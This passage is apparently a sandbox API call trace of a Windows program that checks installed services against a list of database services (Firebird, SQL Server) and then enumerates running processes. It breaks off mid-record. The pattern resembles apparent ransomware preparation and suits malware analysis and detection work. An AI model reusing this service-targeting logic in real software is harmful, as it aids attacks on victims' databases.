[0178.273] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0178.273] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0178.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0178.274] lstrlenW (lpString="DeviceAssociationService") returned 24 [0178.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0178.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0178.274] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0178.274] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0178.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0178.274] lstrlenW (lpString="Dhcp") returned 4 [0178.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0178.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0178.274] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0178.274] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0178.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0178.274] lstrlenW (lpString="Dnscache") returned 8 [0178.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0178.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0178.274] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0178.274] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0178.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0178.274] lstrlenW (lpString="DPS") returned 3 [0178.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0178.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0178.274] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0178.274] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0178.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0178.274] lstrlenW (lpString="DusmSvc") returned 7 [0178.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0178.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0178.275] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0178.275] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0178.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0178.275] lstrlenW (lpString="EventLog") returned 8 [0178.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0178.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0178.275] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0178.275] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0178.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0178.275] lstrlenW (lpString="EventSystem") returned 11 [0178.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0178.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0178.275] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0178.275] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0178.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0178.275] lstrlenW (lpString="FontCache") returned 9 [0178.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0178.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0178.275] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0178.275] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0178.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0178.275] lstrlenW (lpString="gpsvc") returned 5 [0178.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0178.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0178.275] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0178.275] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0178.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0178.275] lstrlenW (lpString="iphlpsvc") returned 8 [0178.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0178.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0178.276] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0178.276] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0178.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0178.276] lstrlenW (lpString="KeyIso") returned 6 [0178.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0178.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0178.276] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0178.276] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0178.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0178.276] lstrlenW (lpString="LanmanServer") returned 12 [0178.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0178.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0178.276] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0178.276] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0178.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0178.276] lstrlenW (lpString="LanmanWorkstation") returned 17 [0178.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0178.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0178.276] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0178.276] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0178.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0178.276] lstrlenW (lpString="lfsvc") returned 5 [0178.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0178.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0178.277] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0178.277] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0178.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0178.277] lstrlenW (lpString="lmhosts") returned 7 [0178.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0178.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0178.277] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0178.277] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0178.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0178.277] lstrlenW (lpString="LSM") returned 3 [0178.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0178.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0178.277] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0178.277] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0178.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0178.277] lstrlenW (lpString="MpsSvc") returned 6 [0178.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0178.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0178.277] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0178.277] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0178.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0178.277] lstrlenW (lpString="NcbService") returned 10 [0178.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0178.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0178.277] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0178.277] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0178.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0178.278] lstrlenW (lpString="netprofm") returned 8 [0178.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0178.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0178.278] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0178.278] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0178.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0178.278] lstrlenW (lpString="NgcSvc") returned 6 [0178.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0178.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0178.278] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0178.278] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0178.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0178.278] lstrlenW (lpString="NlaSvc") returned 6 [0178.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0178.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0178.278] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0178.278] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0178.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0178.278] lstrlenW (lpString="nsi") returned 3 [0178.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0178.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0178.278] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0178.278] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0178.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0178.278] lstrlenW (lpString="PcaSvc") returned 6 [0178.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0178.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0178.278] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0178.279] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0178.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0178.279] lstrlenW (lpString="PlugPlay") returned 8 [0178.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0178.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0178.279] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0178.279] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0178.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0178.279] lstrlenW (lpString="Power") returned 5 [0178.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0178.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0178.279] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0178.279] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0178.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0178.279] lstrlenW (lpString="ProfSvc") returned 7 [0178.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0178.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0178.279] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0178.279] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0178.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0178.279] lstrlenW (lpString="RpcEptMapper") returned 12 [0178.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0178.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0178.279] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0178.279] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0178.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0178.279] lstrlenW (lpString="RpcSs") returned 5 [0178.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0178.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0178.280] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0178.280] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0178.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0178.280] lstrlenW (lpString="SamSs") returned 5 [0178.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0178.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0178.280] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0178.280] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0178.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0178.280] lstrlenW (lpString="Schedule") returned 8 [0178.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0178.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0178.280] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0178.280] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0178.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0178.280] lstrlenW (lpString="SecurityHealthService") returned 21 [0178.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0178.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0178.280] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0178.280] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0178.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0178.280] lstrlenW (lpString="SENS") returned 4 [0178.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0178.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0178.280] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0178.281] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0178.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0178.281] lstrlenW (lpString="ShellHWDetection") returned 16 [0178.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0178.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0178.281] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0178.281] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0178.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0178.281] lstrlenW (lpString="Spooler") returned 7 [0178.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0178.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0178.281] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0178.281] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0178.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0178.281] lstrlenW (lpString="StateRepository") returned 15 [0178.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0178.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0178.281] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0178.281] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0178.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0178.281] lstrlenW (lpString="SysMain") returned 7 [0178.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0178.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0178.281] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0178.281] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0178.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0178.281] lstrlenW (lpString="SystemEventsBroker") returned 18 [0178.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0178.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0178.282] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0178.282] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0178.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0178.282] lstrlenW (lpString="Themes") returned 6 [0178.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0178.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0178.282] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0178.282] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0178.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0178.282] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0178.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0178.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0178.282] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0178.282] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0178.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fd308 | out: hHeap=0x6a0000) returned 1 [0178.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ac [0178.420] Process32FirstW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.420] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0178.421] lstrlenW (lpString="System") returned 6 [0178.421] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0178.422] lstrlenW (lpString="smss.exe") returned 8 [0178.422] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0178.423] lstrlenW (lpString="csrss.exe") returned 9 [0178.423] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0178.425] lstrlenW (lpString="wininit.exe") returned 11 [0178.425] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0178.425] lstrlenW (lpString="csrss.exe") returned 9 [0178.425] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0178.426] lstrlenW (lpString="winlogon.exe") returned 12 [0178.426] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0178.427] lstrlenW (lpString="services.exe") returned 12 [0178.427] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0178.428] lstrlenW (lpString="lsass.exe") returned 9 [0178.428] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0178.429] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0178.429] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0178.430] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0178.430] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.431] lstrlenW (lpString="svchost.exe") returned 11 [0178.431] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.432] lstrlenW (lpString="svchost.exe") returned 11 [0178.432] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0178.432] lstrlenW (lpString="dwm.exe") returned 7 [0178.432] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.433] lstrlenW (lpString="svchost.exe") returned 11 [0178.433] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.434] lstrlenW (lpString="svchost.exe") returned 11 [0178.434] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.435] lstrlenW (lpString="svchost.exe") returned 11 [0178.435] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.436] lstrlenW (lpString="svchost.exe") returned 11 [0178.436] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.436] lstrlenW (lpString="svchost.exe") returned 11 [0178.437] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.437] lstrlenW (lpString="svchost.exe") returned 11 [0178.437] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.438] lstrlenW (lpString="svchost.exe") returned 11 [0178.438] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: 